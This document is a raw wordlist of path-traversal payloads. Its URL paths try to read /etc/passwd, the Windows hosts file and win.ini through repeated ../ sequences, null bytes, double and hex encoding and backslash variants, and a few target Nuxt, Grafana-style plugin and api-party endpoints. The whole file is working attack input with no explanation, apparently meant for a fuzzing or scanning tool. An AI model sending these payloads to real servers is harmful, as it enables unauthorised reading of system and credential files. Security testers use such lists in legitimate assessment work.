/api/__api_party/MyEndpoint
/api/__api_party/__proto__
/
/_nuxt/@fs/etc/passwd
/public/plugins/alertlist/../../../../../../../../../etc/passwd
/../../../../../etc/passwd%00
/../../../../../../etc/passwd
/../../../../../../etc/passwd%00
/../../../../../../../etc/passwd
/../../../../../../../etc/passwd%00
/../../../../../../../../etc/passwd
/../../../../../../../../etc/passwd%00
/../../../../../../../../../etc/passwd
/../../../../../../../../../etc/passwd%00
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../../etc/passwd
//////////////////../../../../../../../../etc/passwd
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
//////../../../etc/passwd
/////////////////////////../../../../../../../../etc/passwd
/.?/windows/system32/drivers/etc/hosts
/.?/.?/.?/.?/windows/system32/drivers/etc/hosts
/.?/.?/.?/.?/.?/.?/windows/system32/drivers/etc/hosts
/.?\.?\windows\system32\drivers\etc\hosts
/.?\.?\.?\windows\system32\drivers\etc\hosts
//......///......///......///......///......///......///windows///system32///drivers///etc///hosts
//......///windows///system32///drivers///etc///hosts
//......///......///......///......///windows///system32///drivers///etc///hosts
/\..../\..../\..../\..../\..../\..../\windows/\system32/\drivers/\etc/\hosts
/0x2f..../0x2f..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts
/0x2f..../0x2f..../0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts
/0x5c..../0x5c..../0x5c..../0x5c..../0x5c..../0x5c..../0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts
/0x5c..../0x5c..../0x5c..../0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts
/.../.../.../.../.../.../windows/system32/drivers/etc/hosts
/.../.../.../.../windows/system32/drivers/etc/hosts
/..././..././..././..././..././..././windows/system32/drivers/etc/hosts
/..././..././..././..././windows/system32/drivers/etc/hosts
/../../../../../../windows/system32/drivers/etc/hosts
/../../../../../../windows/system32/drivers/etc/hosts;index.html
/../../../../../windows/system32/drivers/etc/hosts;index.htm
///..///..///..///..///..///..///windows///system32///drivers///etc///hosts
///..///..///..///..///windows///system32///drivers///etc///hosts
\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
\..\..\..\..\..\..\windows\system32\drivers\etc\hosts;index.html
\../\../\../\../windows/\system32/\drivers/\etc/\hosts
\../\../\../\../\../\../windows/\system32/\drivers/\etc/\hosts
\..\..\..\..\..\..\WINDOWS\win.ini
\\\../../../../../windows\\\system32\\\drivers\\\etc\\\hosts
